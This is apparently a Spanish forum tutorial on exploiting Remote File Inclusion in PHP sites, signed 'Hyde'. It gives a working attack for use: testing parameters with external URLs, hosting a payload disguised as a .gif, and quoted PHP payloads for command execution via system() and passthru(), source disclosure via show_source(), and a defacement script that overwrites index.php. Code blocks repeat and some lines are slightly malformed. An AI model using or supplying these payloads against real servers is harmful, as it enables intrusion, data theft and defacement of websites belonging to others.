www.google.com.ar/search?hl=es&ie=UTF-8&q=la+busqueda&meta=
En dicha URL encontramos las siguientes variables: hl, ie, q, meta
No me detendre a explicar el metodo GET y POST en este momento, tratare de hacer un texto mas explicito sobre ellos mas adelante. Para este documento se da por entendido que se tiene un concepto de estos.
Sigamos:
La vulnerabilidad se haria mas o menos asi: index.php?pagina=inicio.php desde aqui se podrian comenzar con la inclusion de archivos si existe tal bug. Si encontramos alguna que tengamos la idea de que es vulnerable podriamos probarla con nuestro amigo google usando el siguiente camino:
http://www.aquilaweb.com/index.php?variable=http://www.google.com
Si vemos que dentro del sitio se carga la web de google existe la posibilidad de que sea vulnerable dicha web. Para seguir con la vulnerabilidad ahora colocamos lo siguiente:
http.//www.aquilaweb.com/vuln.php?page=http//www.tuweb.com/exploit.gif
Debemos tomar en cuenta que no podemos cambiar la extension a php porque se ejecutaria en nuestro servidor y no en el otro, para hacer esto se debe tener una extension como jpg o gif que deben incluir y el script que se ejecutara en la web victima.
Paseando por la web he encontrado estos scripts:
Citar
<?
/* Este código sirve para ejecutar comandos en el servidor de la web. Esto se hace mediante la siguiente función, que abre la shell y ejecuta el comando que se define por la variable çmd. En este caso es GET para que se pueda definir por la barra de direcciones. También es importante destacar que solo funciona si PHP está configurado con safe_mode OFF*/
$çmd=$_GET[çmd];
system($çmd);
?>
/* Este código sirve para ejecutar comandos en el servidor de la web. Esto se hace mediante la siguiente función, que abre la shell y ejecuta el comando que se define por la variable çmd. En este caso es GET para que se pueda definir por la barra de direcciones. También es importante destacar que solo funciona si PHP está configurado con safe_mode OFF*/
$çmd=$_GET[çmd];
system($çmd);
?>
Citar
<?
/* Este archivo muestra el código fuente del archivo que se pasa por el método GET, mediante la variable file. */
$file=$_GET[file];
show_source($file);
?>
/* Este archivo muestra el código fuente del archivo que se pasa por el método GET, mediante la variable file. */
$file=$_GET[file];
show_source($file);
?>
Fuente de scripts: texto de Paisterist (no recuerdo la URL exacta)
***
Cambiar el index:
Citar
<?
$fp=fopen("index.php","w+");
fwrite($fp,"<title>Hacked</title>
<body bgcolor="#000000" text="#FF9900">
<center>
<font face="Fixedsys">
<font size="6">Hacked</font><br>
<font size="2">Own yOur B0x!</font>
</center> \n");
fclose($fp);
?>
$fp=fopen("index.php","w+");
fwrite($fp,"<title>Hacked</title>
<body bgcolor="#000000" text="#FF9900">
<center>
<font face="Fixedsys">
<font size="6">Hacked</font><br>
<font size="2">Own yOur B0x!</font>
</center> \n");
fclose($fp);
?>
Otro sencillo ejemplo. Guardar com .gif, .jpg, o .txt y hacer el remote file inclusion con la variable vulnerable y la url de este archivo.
Citar
<?
// çMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();passthru("$çmd 1> /tmp/çmdtemp 2>&1; cat/tmp/çmdtemp;rm/tmp/çmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
// çMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();passthru("$çmd 1> /tmp/çmdtemp 2>&1; cat/tmp/çmdtemp;rm/tmp/çmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
Fuente: Ejemplos de RFI por el-brujo
***
El texto es totalmente hecho por mi basado en los textos de ambos sujetos. Cualquier publicacion externa debera llevar por lo menos la referencia de quienes han hecho los scripts y mia. Comentarios aqui.
Salu2
Hyde